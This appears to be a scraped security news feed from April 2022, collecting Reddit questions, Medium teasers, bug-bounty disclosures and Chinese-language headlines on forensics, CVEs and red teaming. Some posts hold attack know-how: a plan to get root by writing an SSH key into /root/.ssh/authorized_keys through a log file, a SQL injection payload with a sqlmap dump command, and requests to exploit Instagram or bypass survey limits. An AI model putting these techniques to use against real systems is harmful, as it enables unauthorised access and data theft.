    I've been playing with a proprietary linux agent recently, it runs as root and it allows a non-root users to arbitrarily set the location of its log files. I can change the location of the log files to anywhere on the file system. I can also, mostly, change the file name. The key issues being that the software appends the date to any filename I choose though! For example, I discovered I can set the logfile name and location to here /root/.ssh/authorized_keys_20220202 I can 'log' my own SSH key into the file contents too. If I could get the file named correctly it would work (which I tested), but I can't. The authorized key is ignored in that name format, which is completely understandable. Do you think this limitation in my ability to control the full file name means I'm done? I've been thinking about other services I know of like .rhosts but I think the same issue would exist. Anyone got any good ideas? submitted by /u/shite_in_a_bucket [link] [comments]
    Advice on getting more interviews for threat intelligence jobs?
    If this is too broad or just generally not allowed here I can delete this. I'm trying to pivot to cyber security and I'm applying for threat intelligence jobs because I already have a strong background in intelligence already (DOD, IC, military). What can I do to increase my chances of getting interviews and offers? I have Network+, scheduled to take Security+ this summer, and after that I'm looking to get another cert (possibly CEH). Also have a TS/SCI and my intelligence background is technical analysis (signals intelligence, network analysis, etc.). Currently dual-hatting as a SME analyst and as a front end developer (HTML, CSS, JS, Angular). Also a advanced beginner / early intermediate Python coder and I've done personal projects to visualize IP connections and Wi-Fi survey type stuff. I've played around with Kali Linux before and DNS dumpster, Whois, Shodan, etc. so I'm comfortable learning technical tools and data. Also planning to deep dive into threat intel feeds and maybe set up my own dashboards for fun and for learning. Have already had 2 screening calls but I really want to break out of plain old DOD intel work and get into something technical and challenging. Any advice is greatly appreciated! P.S. Longer term I'd really like to get into threat hunting but I have 0 experience with any of that so I figured threat intel would be a good way to break into the industry for starters. submitted by /u/WLANtasticBeasts [link] [comments]
  • Open

    Encase Aquistion to forensics mode
    Yes, I'm bringing this post back to the spotlight i cannot get encase to go into forensics mode i have admin privilege over the system my keys are active and I've tried it on 3 different versions is there any tips on how to get this working? submitted by /u/Metriczcaptian88 [link] [comments]
    Forensic Certifications
    HI all , I want to get into digital forensics and was wondering what certifications i should get that will help me get a digital computer forensics job in the public / private sector (FBI , DHS , DOJ) etc.. ALso what would be the best way to prepare for them ? Currently i have the sec + and A+ cert and some programming expereince. submitted by /u/Fortune_Technical [link] [comments]
    Simple Question about Disk Imaging
    Yes, I am a newbie, yes I am just a clueless college student... I am not asking this question so you can tell me how stupid I am or for you to show how smart you are. Your boss is not going to see your response on a reddit post and give you a raise over it... So remember, please be nice. My question: How do forensic investigators create the disk image of a computer without having the password to the computer? I can use FTK imager, guymager, etc... But realistically, how will you use these programs when presented with a victim's computer to which you don't know the password of? Thank you lots! submitted by /u/uTeC3 [link] [comments]
    RAM/Memory Dump of iOS devices
    Hi community.. for my recent project I’m thinking if it is poss to take ram/memory dump of iOS device … I saw for android, it is possible to take systemdump using adb … Any tool to work same as in iOS Any suggestions would be great Thanks submitted by /u/Aromatic_Ideal_2933 [link] [comments]
  • Open

    Home-Grown Red Team: Testing Common AV Evasion With PE Packers On Windows 11
    Bypassing AV solutions is essential for initial access, lateral movement and full domain compromise. Over the last couple of years, we’ve… Continue reading on Medium »
    How To Get The Most Out Of Pen Tests
    I recently wrote an article for the CyCognito blog on getting the most out of pen tests. Pen tests are needed and, when properly done… Continue reading on Medium »
    RED TEAM | KLSFP Certification
    What is Red Teaming? Continue reading on Medium »
    How do I take over Cobalt Strike Team Servers
    Hi folks, today I would like to share how I take over some Cobalt Strike TeamServers with Quake and Password Spray Attack. From the… Continue reading on Medium »
  • Open

    Threat Assessment: BlackByte Ransomware
    BlackByte is ransomware as a service that emerged in July 2021. Read our overview and recommended courses of action for mitigation. The post Threat Assessment: BlackByte Ransomware appeared first on Unit42.
  • Open

    Maltego’s Attempts at Cryptocurrency Investigations
    Maltego is haunted by the laurels of grandiose cryptocurrency investigations… Continue reading on Medium »
    War in Ukraine / April 20
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Another cyberdetective trap
    I came across an interesting GPS tracker https://osmodroid.ru, https://osmo.mobi/app project that allows you to get a digital fingerprint… Continue reading on Medium »
    Recon tools for webapp penetration testing Part-1 (WebProxies & DNS Discovery) tools
    Here are some webapp penetration tools Continue reading on Medium »
    How do I take over Cobalt Strike Team Servers
    Hi folks, today I would like to share how I take over some Cobalt Strike TeamServers with Quake and Password Spray Attack. From the… Continue reading on Medium »
  • Open

    Keeping Up With PHP Updates
    Staying on top of critical security risks and vulnerabilities is imperative for the safety of your website. Some of the types of threats impacting our client sites include injections, broken authentication, cross site scripting, or even attackers targeting components with known vulnerabilities. In this post, we’ll be going over why outdated PHP versions can lead to an increase in vulnerabilities with your website and how you can minimize these risks to protect your site and your visitors. Continue reading Keeping Up With PHP Updates at Sucuri Blog.
  • Open

    SecWiki News 2022-04-21 Review
    利用神经网络挖掘共同特征发现未知的APT by ourren BinAbsInspector:二进制文件自动化静态漏洞检测工具 by ourren 一窥世界上延迟最低的网络 by Avenger WMI后门技术的攻击与检测 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-21 Review
    利用神经网络挖掘共同特征发现未知的APT by ourren BinAbsInspector:二进制文件自动化静态漏洞检测工具 by ourren 一窥世界上延迟最低的网络 by Avenger WMI后门技术的攻击与检测 by ourren 更多最新文章,请访问SecWiki
  • Open

    JBoss EAP/AS <= 6.* RCE - A little bit beyond \xAC\xED
    submitted by /u/j_jjjj [link] [comments]
    Hello all, I have release a new version of SCodeScanner v2.1.0 where it contains advance rules and some additonal features. Features includes removing false positives, send outputfile directly to jira and Slack, more info - https://github.com/agrawalsmart7/scodescanner & https://scodescanner.info.
    submitted by /u/agrawal7 [link] [comments]
    CVE-2022-21449 PoC demonstrating TLS MITM
    submitted by /u/kmhn [link] [comments]
  • Open

    官方发布重磅报告,全面曝光美国网络攻击武器“蜂巢”
    那个曾经看似风平浪静的互联网,底下正暗流涌动,当我们还在享受互联网带来的服务时,无数的后门和木马早已悄悄嵌入其中。
    知识大陆招募 | 这里有未来,而你刚好在
    本期将招募3位领主!一起参与知识大陆共建共享吧!
    FreeBuf早报 | 俄罗斯APT组织继续瞄准乌克兰;BlackCat勒索软件入侵全球60个实体
    Black Cat 勒索软件团伙,在 2021 年 11 月至 2022 年 3 月期间,至少入侵了全球 60 个组织的网络。
    REvil的TOR网站重新启动,一大波新型勒索软件或正在路上
    近日,有相关研究显示,REvil勒索软件在TOR网络上的服务器在经历数月的寂静后恢复了正常运行。
    FBI警告针对美国农业部门的勒索软件攻击
    美联邦调查局(FBI)警告食品和农业(FA)部门勒索软件团伙“更有可能”在收获和种植季节对其发动网络攻击。
    北约2022 “锁盾 ”网络演习在爱沙尼亚举行,2000名安全专家共同练兵
    北约合作网络防御卓越中心(CCDCOE)于4月19日至22日组织2022年度“锁盾”网络演习。
    《安恒网络安全3月月报》| 一份报告看全3月黑灰产、漏洞、APT、勒索、暗链等汇总信息
    一份报告看全3月黑灰产、漏洞、APT、勒索、暗链等汇总信息。
  • Open

    Exploiting Security Checks on Bind Mount
    submitted by /u/tbhaxor [link] [comments]
  • Open

    解决哥斯拉内存马 pagecontext 的问题
    作者:Y4er 原文链接:https://y4er.com/post/solve-the-problem-of-godzilla-memory-shell-pagecontext/ 前言 注入内存马借助当前的webshell工具而言,冰蝎可以通过创建hashmap放入request、response、session替换pagecontext来解决 HttpSession session = ...
  • Open

    解决哥斯拉内存马 pagecontext 的问题
    作者:Y4er 原文链接:https://y4er.com/post/solve-the-problem-of-godzilla-memory-shell-pagecontext/ 前言 注入内存马借助当前的webshell工具而言,冰蝎可以通过创建hashmap放入request、response、session替换pagecontext来解决 HttpSession session = ...
  • Open

    What do you need to know to develop expert-level exploits?
    Developing professional-level 0day and slient exploits, breaking them, example jpeg word macro etc etc. what needs to be learned to write advanced exploits. I'm learning c and c++, I work 8 hours a day, and the remaining 2 hours I work on python, what do you think I need to learn to write and understand exploits at a full professional level? submitted by /u/Sargatanas_ [link] [comments]
  • Open

    Know The Difference Between XSS vs CSRF
    Cross-site Scripting (XSS) and Cross-site request forgery (CSRF) are very common client-site attacks against web applications. While XSS… Continue reading on Medium »
  • Open

    【安全通报】Atlassian Bitbucket Data Center 远程代码执...
    近日,Atlassian发布安全公告,修复了一个存在于Atlassian Bitbucket Data Center中的代码执行漏洞,该漏洞...
  • Open

    【安全通报】Atlassian Bitbucket Data Center 远程代码执...
    近日,Atlassian发布安全公告,修复了一个存在于Atlassian Bitbucket Data Center中的代码执行漏洞,该漏洞...

  • Open

    Best Practice Regarding iMessage Sync In UFED iOS Extraction Scenarios
    What exactly happens to iMessage data (attachments and message content) when the Message Sync button found at Settings>name>iCloud>Messages is enabled? Does the data leave the device and join the cloud where it is then synced across other iOS devices that belong to the user or does this data remain locally with a copy of this data existing in the cloud? Perhaps a mixture of the two occurs? Within the context of a forensic iOS data extraction via UFED, I have some colleagues who believe it’s best practice to disable message sync prior to the extraction attempt so that the messages are downloaded back to the device and are included in the subsequent extraction dataset. In contrast, I have other colleagues who claim iMessage data never truly leaves the sms.db so even if message sync is enabled, extraction via UFED should result in all iMessage data being captured anyway. This article from Elcomsoft seems to somewhat support the latter theory, albeit vaguely. I haven’t been able to find any other research into this. What are your thoughts? What is best practice for forensic iOS data extraction when Message Sync is enabled? Do you disable Message Sync and wait for whatever is happening to finish or do you just perform the data extraction with no regard for the Message Sync setting? submitted by /u/ucfmsdf [link] [comments]
    FTK imager recover deleted files
    Hi guys im new to ftk imager i have created a seperate D drive on my windows machine and deleted some files from it. In ftk imager i created a new disck image logical drive raw format. I see the deleted files and click on export file. After opening the exported file i get an error saying "The file cant be opened That might be because the file type is unsupported, the file extension is incorrect, or the file is corrupt." .Any idea what im doing wrong? submitted by /u/Fortune_Technical [link] [comments]
    No boot after conversion of .E01
    Hello everyone!I'm trying to convert an .E01 to a vMware machine, but every time I try to start the virtual machine there is not bootable device. I tried to mount the forensics image with FTK Imager as a physical disk (writable, without logic unit), and open it with vMware.Also, i tried with Oracle VM VirtualBox and Mount Image Pro v7 without results.I also tried the conversion using vboxmanage.exe, using the result file with vMware Player ​ https://preview.redd.it/9a6ob5cmspu81.jpg?width=722&format=pjpg&auto=webp&s=3cac78e0145092fc785c3a00e4356c83418aaa06 Someone can help me, please?I need to run the OS inside my .E01 file to run a specific software submitted by /u/Zipper_Ita [link] [comments]
  • Open

    What VPS to choose?
    There are tons of cloud providers that offer different types of servers with a lot of different options. I will talk about the ones I… Continue reading on Medium »
    Exploiting a File Upload Vulnerability  — A Directory Traversal Attack
    Hello people, happy to have you here once again. I do hope you enjoy this write-up as much as I enjoyed ‘writing’ it. I would have to… Continue reading on Medium »
    Container Escape Vulnerability in AWS Hot Patch
    Update or mitigate now if you are affected (if you run containers, you probably are.) Continue reading on Cloud Security »
    Hacked REDBUS WordPress plugin and able to perform Cross-site Scripting Vulnerability….
    Hello, Hackers Welcome back to another writeup where I have shared a scenario of WP_plugin being vulnerable to Cross-site Scripting… Continue reading on Medium »
    youtube.com or уoutube.com??
    As you can see both of them looks identical but the thing is the second уoutube.com wont work.Your first reaction “How the hell its… Continue reading on Medium »
    CVE-2022–29072 Windows Privilege Escalation
    7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the… Continue reading on Medium »
  • Open

    Survey website that only allows one submission a month
    My company has a survey that only allows one submission a month. All other submissions are not counted or reviewed. I'm assuming that the website tracks IPs. I want to ensure that I cannot be traced back to my survey and I want to be able to submit multiple surveys a month. Would a VPN protect my identity. Is there another way that the company could be tracking me or submissions? submitted by /u/thukirby [link] [comments]
    Question about Blind SQL injection?
    Hi I was wondering if someone could shed some light, Currently was scanning my site testing out wapiti and i was shock to find 11 blind sql injection, which im thinking its a false alert whats odd is that in no part of the website i tried accessing shows any errors /_next/image?url=%2F_next%2Fstatic%2Fimage%2Fpublic%2Fimg%2Fbanners%2Fbanner-XXX-XXXX-XXX-XXX.2d09a971dce1f42dXXXXXXXXX.jpg%2Csleep%287%29%231&w=1200&q=75 HTTP/1.1 i tried on sqlmap but not sure if that was the correct mapping? ​ sqlmap -u "https://mydomain/_next/image?url=75*" --dbs --level=5 --risk=3 --dump --batch --tamper=space2comment --threads 10 ​ Thank you submitted by /u/killmasta93 [link] [comments]
  • Open

    $10k Host header vulnerability in Google App Engine
    Article URL: https://sites.google.com/site/testsitehacking/10k-host-header Comments URL: https://news.ycombinator.com/item?id=31102998 Points: 2 # Comments: 0
    Java 15 introduced a cryptographic vulnerability
    Article URL: https://www.itnews.com.au/news/java-15-introduced-a-cryptographic-vulnerability-578958 Comments URL: https://news.ycombinator.com/item?id=31096184 Points: 79 # Comments: 31
  • Open

    Open Akamai ARL XSS at
    U.S. Dept Of Defense disclosed a bug submitted by whoisbinit: https://hackerone.com/reports/1317024
    Full account takeover in due lack of rate limiting in forgot password
    U.S. Dept Of Defense disclosed a bug submitted by takester: https://hackerone.com/reports/1059758
    vulnerable to CVE-2022-22954
    U.S. Dept Of Defense disclosed a bug submitted by null_bytes: https://hackerone.com/reports/1537694
    CORS Misconfiguration
    U.S. Dept Of Defense disclosed a bug submitted by shirshak: https://hackerone.com/reports/1530581
    Reflected XSS in the shared note view on https://evernote.com
    Evernote disclosed a bug submitted by sarka: https://hackerone.com/reports/1518343 - Bounty: $500
  • Open

    looking for an exploiter who can create gametools for an online game
    submitted by /u/dr4iner [link] [comments]
    Career Change Options: Binary Exploitation or Pentesting/Red Teaming
    Hi All, I currently do Incident Response and Threat Hunting for an organization and lost the passion. A few months ago, I found binary exploitation and liked it. However, I'm stuck on a roadmap. I thought of moving laterally to the RED team side, thinking it would be a good foundation. However, with pentesting there would be a lot to learn since your skills need to be broad. I wouldnt have the chance also to create exploits. I want to develop exploits and find new vulnerabilities. I have been doing RE and Malware analysis for some time now as a side hobby and some Binary Exploitation courses. As a security professional my interests and goals right now are to break tech (new and old) and find unique and creative ways of entering. Wondering what a good path/road map to take to get into vulnerability research? The way I see it there's two options: Get into pentesting (AD and Web) to learn the building blocks and do VR on the side. Find the area you want to specialize in and focus on the vulns there. Gain experience and do red teaming. Find a codebase and platform within a Bug Bounty platform, research the hell out of it, and start poking around. Maybe move into AppSec. Very new to this side of the house, so please feel free to correct me or add your opinions thanks! submitted by /u/SushiSush1 [link] [comments]
  • Open

    Threat Hunting for Phishing Pages
    submitted by /u/mstfknn [link] [comments]
    CVE-2022-21449 detector - Finds possibly vulnerable JAR/WAR files
    submitted by /u/SRMish3 [link] [comments]
    A Detailed Analysis of The SunCrypt Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    SSRF Attack Examples and Mitigations
    submitted by /u/benarent [link] [comments]
    CVE-2022-21449: Psychic Signatures in Java
    submitted by /u/Gallus [link] [comments]
  • Open

    JDK CVE-2022-21449
    Article URL: https://access.redhat.com/security/cve/cve-2022-21449 Comments URL: https://news.ycombinator.com/item?id=31101123 Points: 2 # Comments: 0
    Jira Server and Jira Data Center CVE-2022-0540 – Authentication Bypass in Seraph
    Article URL: https://community.atlassian.com/t5/Jira-articles/Jira-Server-and-Jira-Data-Center-CVE-2022-0540-Authentication/ba-p/2006104 Comments URL: https://news.ycombinator.com/item?id=31100115 Points: 4 # Comments: 0
    CVE-2022-29153: To Consul or Not to Consul
    Article URL: https://ronin.ae/news/2022/04/15/CVE-2022-29153-to-consul-or-not-to-consul.html Comments URL: https://news.ycombinator.com/item?id=31093969 Points: 1 # Comments: 1
  • Open

    OSINT in VKontakte
    Today I will analyze the main sources of data that I use when conducting OSINT investigations on the Russian social network VKontakte. Continue reading on Medium »
    War in Ukraine / April 19
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    SecWiki News 2022-04-20 Review
    浅谈攻防演练 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-20 Review
    浅谈攻防演练 by ourren 更多最新文章,请访问SecWiki
  • Open

    FreeBuf早报 | 工信部通报37款侵害用户权益App;一种实时语音算法可阻止麦克风窃听
    哥伦比亚大学的研究人员介绍,该算法可以预测性地工作,会推断用户接下来会说什么,并实时生成阻塞背景噪音以覆盖声音。
    警惕!加泰罗尼亚政治家活动家受间谍软件攻击
    一个并不起眼的零点击(zero-click)漏洞可能很早就被利用以安装来自以色列网络公司NSO和Candiru的间谍软件。
    针对DVR设备的新BotenaGo恶意软件变种
    近期,威胁分析人员发现了BotenaGo僵尸网络恶意软件的一种新变种。
    CISA 发出警告,攻击者正在利用 Windows 漏洞
    CISA 积极利用漏洞列表新增了 Windows Print Spooler 中的本地权限提升漏洞。
    ESET发出警告,联想三个漏洞影响数百万台电脑
    ESET研究人员在2021年10月向联想报告了这三个严重的安全漏洞,目前这些漏洞已经全部修复完成。
    数量猛增,LinkedIn已成为网络钓鱼者的最爱
    LinkedIn在今年第一季度的网络钓鱼活动急剧升温,目前已占全球网络钓鱼数量的52%,位居排行榜首位。
    FreeBuf早报 | 美中情局主站网络武器“蜂巢”曝光;联想固件漏洞影响数百万电脑
    近日,国家计算机病毒应急处理中心发现,“蜂巢”(Hive)恶意代码攻击控制武器平台系美国中央情报局(CIA)专用的主站网络武器。
  • Open

    Burp Suite Extensions for Web Hunting
    Introduction Continue reading on InfoSec Write-ups »
    $1000: How I could have Hack any account and become a billionaire overnightTop Crypto-Trading….
    No content preview
    Create Bind and Reverse Shells using Netcat
    No content preview
  • Open

    Burp Suite Extensions for Web Hunting
    Introduction Continue reading on InfoSec Write-ups »
    $1000: How I could have Hack any account and become a billionaire overnightTop Crypto-Trading….
    No content preview
    Create Bind and Reverse Shells using Netcat
    No content preview
  • Open

    Burp Suite Extensions for Web Hunting
    Introduction Continue reading on InfoSec Write-ups »
    $1000: How I could have Hack any account and become a billionaire overnightTop Crypto-Trading….
    No content preview
    Create Bind and Reverse Shells using Netcat
    No content preview

  • Open

    Alright guys, can someone help me find this attack I'm doing??
    So I received the following from my ISP. I received 4 other ones last week, and I believe that I have identified the machine. It's a desktop PC running Linux Mint. I'm okay with Linux, I've run a couple of headless servers before, and used ubuntu as a daily driver for a couple years, but outside of tasks I needed to complete my knowledge is not high. I can't find anything in any logs that indicates this activity, but I'll be honest, I don't even know how deep I'm looking. I also have no idea where I could have picked up a script like this either. ​ I'm likely gonna just nuke the machine, and get a new IP address from my ISP, but I'd like to try and isolate this first. My IP has been redacted, but everything is there otherwise. The previous failed attacks were all trying to breach german IPs, I can post those too if they would help. ​ ​ ​ A device using your connection attempted to access another network without authorization. Apr 18 16:02:58 li352-240 sshd[2818468]: pam_unix(sshd:auth): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=XXXXXX user=root Apr 18 16:03:00 li352-240 sshd[2818468]: Failed password for root from XXXXX port 51808 ssh2 Apr 18 16:03:01 li352-240 sshd[2818468]: Received disconnect from XXXXX port 51808:11: Bye Bye [preauth] Apr 18 16:03:01 li352-240 sshd[2818468]: Disconnected from authenticating user root XXXXX port 51808 [preauth] Apr 18 16:03:02 li352-240 sshd[2818491]: pam_unix(sshd:auth): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=XXXXX user=root.......... submitted by /u/Beginning-Pace-1426 [link] [comments]
    CHFI EXAM
    I am taking my ec- council CHFI cert in a week. As i have seen people are not a fan of this cert or ec - council (it was free otherwise i would have chosen a different one). That all being said i am taking the version 9 exam and study material is outdated, along with the labs and book they provide. So people who have taken it, what is they best way to study? i have sound exam questions and a few people said most of those questions are on the exam. Thank you, just trying to be ready for it submitted by /u/Critical-Balance7980 [link] [comments]
    How to convert a pcap file to an image file?
    I want to convert my pcap file to a png format file. submitted by /u/One-Ad2289 [link] [comments]
    What should I study for this job application?
    Hi everyone, I'm applying for a digital forensics job in LE and the first stage is a test. I have read the FAQs in this subreddit but found nothing about what to expect in job application tests (not interviews). The application states that applicants should prepare for the test by studying the following (roughly translated to English): - Law measures for digital evidence collection and chain of custody - Digital forensics - Operating systems - File systems - Windows registry - OSINT (Open Source Intelligence) I have some knowledge of all these subjects but I'm by no means an expert. What should I focus on while studying so that I can cover most bases? submitted by /u/InfoSecSensei [link] [comments]
    It’s not always clear which US Gov jobs are digital Forensics, so I’ve created a scraper!
    submitted by /u/Strijdhagen [link] [comments]
    I’ve noticed something interesting about the UITextInputContextIdentifiers.plist file (pulled from an encrypted iOS backup) - in some cases, it identify’s a Signal contact by phone number, whereas others are only listed by a UID … anyone else aware of the following?
    Can someone please explain to me UITextInputContextIdentifiers.plist - It seems to identify some contacts by phone number but others by UID code? I'm trying to get my head around the UITextInputContextIdentifiers.plist file and the way in which it identifies the contacts. As you're probably all aware, its a common file (certainly on iOS) to Whatsapp, Signal, iMessenger etc etc, which lists the users that a communications app interacts with. I've noticed however that there is some differences between different apps and files and times and dates that I view these files on one of my "daily drivers" that gets regular use.. Some UID's are random like this: ID_CK_40a10d98edf9f302ad15daac98bf2da665ab8 Some UID's are directly identifiable by the contact phone number (obviously I'm just usin…
  • Open

    AWS's Log4Shell HotPatch Vulnerable to Container Escape and Privilige Escalation
    submitted by /u/YuvalAvra [link] [comments]
    US Govt Cloud Security Needs ("SCuBA"): including Technical Reference Architecture and Extensible Visibility Reference Framework (eVRF) Guidebook links
    submitted by /u/ScottContini [link] [comments]
    Shielder - Printing Fake Fiscal Receipts - An Italian Job p.1
    submitted by /u/smaury [link] [comments]
    Teaching Burp a new HTTP Transport Encoding
    submitted by /u/0xdea [link] [comments]
    Exploiting, detecting, and correcting IAM security misconfigurations
    submitted by /u/MiguelHzBz [link] [comments]
    CVE-2022-26809 : Remote Procedure Call Runtime Vulnerability
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    AWS Log4Shell HotPatch Introduced a Container Escape Vulnerability
    Article URL: https://unit42.paloaltonetworks.com/aws-log4shell-hot-patch-vulnerabilities/ Comments URL: https://news.ycombinator.com/item?id=31090332 Points: 8 # Comments: 1
  • Open

    AWS's Log4Shell Hot Patch Vulnerable to Container Escape and Privilege Escalation
    We identified severe security issues within AWS Log4Shell hot patch solutions. We provide a root cause analysis and overview of fixes and mitigations. The post AWS's Log4Shell Hot Patch Vulnerable to Container Escape and Privilege Escalation appeared first on Unit42.
  • Open

    Black Box Test on eCPTXv2 exam
    Hi folks, just as I promised, I am sharing my review on eLearnSecurity’s eCPTX exam from an exam taker without purchasing course material… Continue reading on Medium »
  • Open

    Poodle and Doodle, FUD and the Sucuri WAF
    On any given day, Sucuri sees thousands of clients go through the PCI compliance process. The requirements outlined by the Payment Card Industry Data Security Standards (PCI DSS) are mandatory for any website accepting credit card payment, and this process can be very stressful for website owners not familiar with these guidelines. Failure to comply with PCI requirements could result in penalties, large fines, or even lose the ability to take online credit card payments.  Continue reading Poodle and Doodle, FUD and the Sucuri WAF at Sucuri Blog.
  • Open

    April 2022 Git Vulneratibility (CVE-2022-24765) Explained
    Article URL: https://www.youtube.com/watch?v=3Kct--wJARc Comments URL: https://news.ycombinator.com/item?id=31087896 Points: 1 # Comments: 0
  • Open

    GRC Tool that Primarily Focuses on Managing Security Controls
    Hi all. I'd like to ask for a bit of recommendation on which GRC tool to use for an organization. The focus is all about managing security controls (e.g. can the control relate to other policies, other controls, be tagged); Ideally, I'd like to import existing security controls without much manual input if possible and the GRC tool would be a superior option over managing security controls over excel; The GRC tool makes the management of control data easier rather than the status quo. I've currently dived into eramba GRC so far, but I'm afraid for the sophistication of all of the features, the onboarding, and learning curve is a bit high. In addition, it does not seem to check off all of the user friendly requirement in order to have security controls implemented, managed, and audited. My question is, are there any other GRC tools (focus on the management of security controls) that you'd recommend in order to fulfill these points? An on prem solution would be nice, and cost isn't a huge issue. submitted by /u/SimplyMoxie [link] [comments]
    Entry Level Net Sec Career Advice
    Hello, I'm about to graduate with a computer science degree in a few weeks. I've been doing a lot of self teaching using THM and HTB, but I have no formal technical experience other than my degree and a web development internship. My end goal is to become a penetration tester/red teamer, but I have quite a bit to learn before I get there. I'm planning on applying to junior cyber positions in my area, but I've heard it's extremely difficult getting into an entry level position out of college. I was hoping for some insight about what kind of path should I take. Should I go for IT roles before applying to entry level cyber? Should I get Security+ or some other certification before applying? There's a lot of information out there and a lot of options, I just want to make sure that I'm making a smart decision. Thanks! submitted by /u/Lethal_Injections [link] [comments]
    Trying to start a career in Cyber Security.
    I was looking into switching to Cyber Security and NYU Cyber Security Bootcamp keeps popping up. It says its from NYU Professional Studies and they dont accept educational loans which is kind of odd. Has anyone tried there program? And it is legitimate? Seems a lil sus that a university wont take educational loans. submitted by /u/amatsuastray [link] [comments]
  • Open

    A Detailed Guide on HTML Smuggling
    Introduction HTML Smuggling is an evasive payload delivery method that helps an attacker smuggle payload past content filters and firewalls by hiding malicious payloads inside The post A Detailed Guide on HTML Smuggling appeared first on Hacking Articles.
  • Open

    A Detailed Guide on HTML Smuggling
    Introduction HTML Smuggling is an evasive payload delivery method that helps an attacker smuggle payload past content filters and firewalls by hiding malicious payloads inside The post A Detailed Guide on HTML Smuggling appeared first on Hacking Articles.
  • Open

    $1000: How I could have Hack any account and become a billionaire overnightTop Crypto-Trading….
    After several emails with the security team [ which also includes depression & demotivat] and the HITCON team, the company Continue reading on InfoSec Write-ups »
    My Pentest Log -15- (HTML Injection in Wordpress)
    Greetings Everyone from Thrakion, Continue reading on Medium »
    Bug Bounty Tip 01
    Hello all, today will see one basic bug bounty tip or bug : Continue reading on Medium »
    Account Takeover By Password Reset Function.
    HI, This is Roshan Bhalerav (RBspider) how are you all hope doing great work and making good money. So today I will discuss on my last… Continue reading on Medium »
  • Open

    War in Ukraine / April 18
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Finding Elliot From Mr.Robot
    The other day I talked about the importance of props or objects around a target. But is that a viable option all the time? Let’s see! Continue reading on Medium »
  • Open

    LNK (Ab)use
    I've discussed LNK files a number of times in this blog, and to be honest, I really don't think that this is a subject that gets the attention it deserves. In my experience, and I humbly bow to collection bias here, LNK files are not as well understood as they (sh|c)ould be in the DFIR and CTI fields, which puts defenders at a disadvantage. When I suggest that LNK files aren't really well understood by DFIR and CTI teams, I'm basing that on my own experience with multiple such teams over the years, largely the result of direct interaction. Why is that? Well, the LNK file format is well documented at the MS site, and there have been a number of tools written over the years for parsing these files. I've even gone so far as to create the smallest functioning LNK file, based on the minimum fun…
  • Open

    Need help to Exploit Instagram.
    Can someone find a way to react to a message in dm with text (instead of emoji) and tell me how to do it. Using chrome on laptop. Pleaseeeeeeeeeeee... helpcode #exploit submitted by /u/Old-Imagination8499 [link] [comments]
  • Open

    SecWiki News 2022-04-19 Review
    网络犯罪形态的碎片化与刑事治理的体系化 by ourren 浅析SSRF的各种利用方式 by ourren “蜂巢”恶意代码攻击控制武器平台分析报告 by ourren 数字中国车联网赛题设计思路 by ourren 机器学习如何赋能二进制代码相似性分析 by ourren TP-Link-WDR-7660 安全研究之构造基于串口CMD的调试器 by ourren Go template 遇上 yaml 反序列化 CVE-2022-21701 分析 by ourren 社区合作的威胁情报到底有没有用? by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-19 Review
    网络犯罪形态的碎片化与刑事治理的体系化 by ourren 浅析SSRF的各种利用方式 by ourren “蜂巢”恶意代码攻击控制武器平台分析报告 by ourren 数字中国车联网赛题设计思路 by ourren 机器学习如何赋能二进制代码相似性分析 by ourren TP-Link-WDR-7660 安全研究之构造基于串口CMD的调试器 by ourren Go template 遇上 yaml 反序列化 CVE-2022-21701 分析 by ourren 社区合作的威胁情报到底有没有用? by Avenger 更多最新文章,请访问SecWiki
  • Open

    Invitation Email is resent as a Reminder after invalidating pending email invites
    Mattermost disclosed a bug submitted by mr_anksec: https://hackerone.com/reports/1486820 - Bounty: $150
    xss on [developers.mtn.com]
    MTN Group disclosed a bug submitted by pisarenko: https://hackerone.com/reports/924851
  • Open

    Resolving System Service Numbers using the Exception Directory - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
  • Open

    赠书福利 | 还在寻找渗透秘籍?这本书就够了!
    有没有一本科学、循序渐进、理论与实战结合的“黑客秘籍”呢?
    65.5万美元不翼而飞 黑客从iCloud备份中获取MetaMask种子
    近日,MetaMask应用程序向其iOS用户发布了警告。
    新发现的零点击iPhone漏洞被NSO间谍软件利用
    Citizen Lab的数字威胁研究人员发现了一种新的零点击iMessage漏洞利用。
    新的暗网市场 Industrial Spy 正在出售数据
    一个名为 Industrial Spy 的暗网市场最近异常活跃,正在积极出售或免费提供被盗公司的数据。
    Beanstalk遭攻击损失1.8亿美元,攻击者将25万美元捐给乌克兰
    基于以太坊的稳定币协议Beanstalk Farms遭到了黑客的闪电贷攻击,随后官方承认了这一攻击,宣布暂停一切与合约互动。
    虚假升级网站再现!Win11已成恶意软件的“香饽饽”
    黑客利用Win11升级散步新型恶意软件,窃取受害用户的浏览器数据甚至加密货币钱包。
    连绵不断,Anonymous组织持续对俄发动进攻
    近期,国际知名黑客组织“匿名者”(Anonymous)伙同其他黑客组织发起了对俄罗斯政府机构组织的新一轮攻击。
  • Open

    Vaf Cross-platform Advanced Web Fuzzer
    Continue reading on Medium »
  • Open

    Vaf Cross-platform Advanced Web Fuzzer
    Continue reading on Medium »

  • Open

    Cisco Wireless LAN Controller Interface Authentication Bypass Vulnerability
    Article URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-auth-bypass-JRNhV4fF Comments URL: https://news.ycombinator.com/item?id=31078246 Points: 2 # Comments: 0
    Arbitrary file write vulnerability in GNU gzip's zgrep utility
    Article URL: https://access.redhat.com/security/cve/cve-2022-1271 Comments URL: https://news.ycombinator.com/item?id=31076009 Points: 97 # Comments: 37
  • Open

    Video demonstrating Office VSTO payload delivery (great replacement for macros :) )
    submitted by /u/an0n_r0 [link] [comments]
    Red Team Infrastructure
